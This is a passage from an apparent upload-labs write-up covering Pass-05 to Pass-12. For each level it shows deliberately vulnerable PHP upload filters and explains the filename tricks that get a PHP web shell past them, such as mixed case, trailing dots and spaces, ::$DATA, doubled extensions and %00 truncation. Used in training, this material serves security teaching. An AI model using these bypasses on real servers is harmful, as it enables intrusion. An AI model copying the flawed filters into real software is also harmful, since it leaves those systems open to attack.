class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">// strip trailing dots from the filename</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'Upload error!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'This file type is not allowed!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">' folder does not exist, please create it manually!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The case handling is incomplete: this level has no strtolower() call, and the blacklist only lists a handful of mixed-case spellings, so an extension such as <code>.phP</code> is not matched by in_array(). Apache's mod_mime compares extensions case-insensitively, so the renamed <code>.phP</code> file is still executed as PHP.</p><h2 id="第6关-空格"><a href="#第6关-空格" class="headerlink" title="Pass-06 Trailing space"></a>Pass-06 Trailing space</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span 
class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">// strip trailing dots from the filename</span></span><br><span class="line"> $file_ext = 
strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'Upload error!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'This file is not allowed'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">' folder does not exist, please create it manually!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>This level keeps strtolower() but drops the trim() on the extension (and on the filename), so append a <strong>space</strong> to the filename: <code>shell.php </code> gives the extension <code>.php </code>, which is not in the list. The generated path therefore ends in <code>.php </code>, and Windows discards trailing spaces when it creates a file, so it is stored as <code>.php</code> and executes. This relies on Windows filename handling; on Linux the space is kept and the file is not treated as PHP.</p><h2 id="第7关-点"><a href="#第7关-点" class="headerlink" title="Pass-07 Trailing dot"></a>Pass-07 Trailing dot</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span 
class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = 
strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'Upload error!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'This file type is not allowed!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">' folder does not exist, please create it manually!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>This level has no deldot() call, so the trailing dot survives: for <code>shell.php.</code> strrchr() returns only <code>.</code>, which is not in the blacklist. The file is saved under its original name, and Windows silently drops a trailing dot when creating a file, so it ends up on disk as <code>shell.php</code>.</p><h2 id="第8关-DATA"><a href="#第8关-DATA" class="headerlink" title="Pass-08 ::$DATA"></a>Pass-08 ::$DATA</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span 
class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">// strip trailing dots from the filename</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span 
class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'Upload error!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'This file type is not allowed!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">' folder does not exist, please create it manually!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Still a blacklist, but this level leaves out the str_ireplace() that strips <code>::$DATA</code> from the extension. Upload <code>shell.php::$DATA</code>: the extension becomes <code>.php::$DATA</code>, which is not in the list. On NTFS <code>::$DATA</code> names a file's default data stream, so when the renamed file is written Windows treats the path as a plain <code>.php</code> file.</p><h2 id="第9关-点-空格-点"><a href="#第9关-点-空格-点" class="headerlink" title="Pass-09 Dot + space + dot"></a>Pass-09 Dot + space + dot</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span 
class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span 
class="comment">// strip trailing dots from the filename</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'Upload error!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'This file type is not allowed!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . 
<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Blacklist filtering. Note that the line below differs from the previous levels: the path is built from the <em>processed</em> filename, so whatever survives the cleaning functions is used as the name on disk:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br></pre></td></tr></table></figure><p>Same principle as Pass-06: append <strong>dot + space + dot</strong> to the uploaded filename. deldot() strips only the final dot (it stops at the space), strrchr() then returns ". " (dot, space), trim() reduces that to "." and a bare dot is not on the blacklist. On Windows the filesystem API drops trailing dots and spaces when the file is created, so the file lands on disk as shell.php:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell.php. .</span><br></pre></td></tr></table></figure><h2 id="第10关-嵌套绕过"><a href="#第10关-嵌套绕过" class="headerlink" title="Pass-10: nested (double-write) bypass"></a>Pass-10: nested (double-write) bypass</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> 
(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span 
class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Blacklisted extensions are simply deleted from the filename in a single, non-recursive pass (str_ireplace does not re-scan its own output):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br></pre></td></tr></table></figure><p>So it can be bypassed by doubling (nesting) the extension: the inner "php" is removed once, and the characters left on either side of it close up to form "php" again, so the file is saved as shell.php:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell.pphphp</span><br></pre></td></tr></table></figure><h2 id="第11关-GET型00截断"><a href="#第11关-GET型00截断" class="headerlink" title="Pass-11: GET-based %00 truncation"></a>Pass-11: GET-based %00 truncation</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span 
class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Whitelist check on the extension, but $img_path is built by concatenating the user-controlled save_path directly; the validated extension is only appended at the end and does nothing to protect what comes before it:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br></pre></td></tr></table></figure><p>So %00 truncation can be used to bypass it: upload a .jpg and set save_path to something like ../upload/shell.php%00. The query string is URL-decoded to a NUL byte, and the C string handling underneath move_uploaded_file() stops at that byte, so everything appended after it (the slash, the random number, the timestamp and .jpg) is ignored. Two preconditions:</p><ul><li>magic_quotes_gpc must be off (otherwise the NUL byte is escaped to \0 and no truncation happens)</li><li>PHP version <5.3.4 (later versions reject filesystem paths that contain a NUL byte)</li></ul><h2 id="第12关-POST型00截断"><a href="#第12关-POST型00截断" class="headerlink" title="Pass-12: POST-based %00 truncation"></a>Pass-12: POST-based %00 truncation</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span 
class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_POST[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span 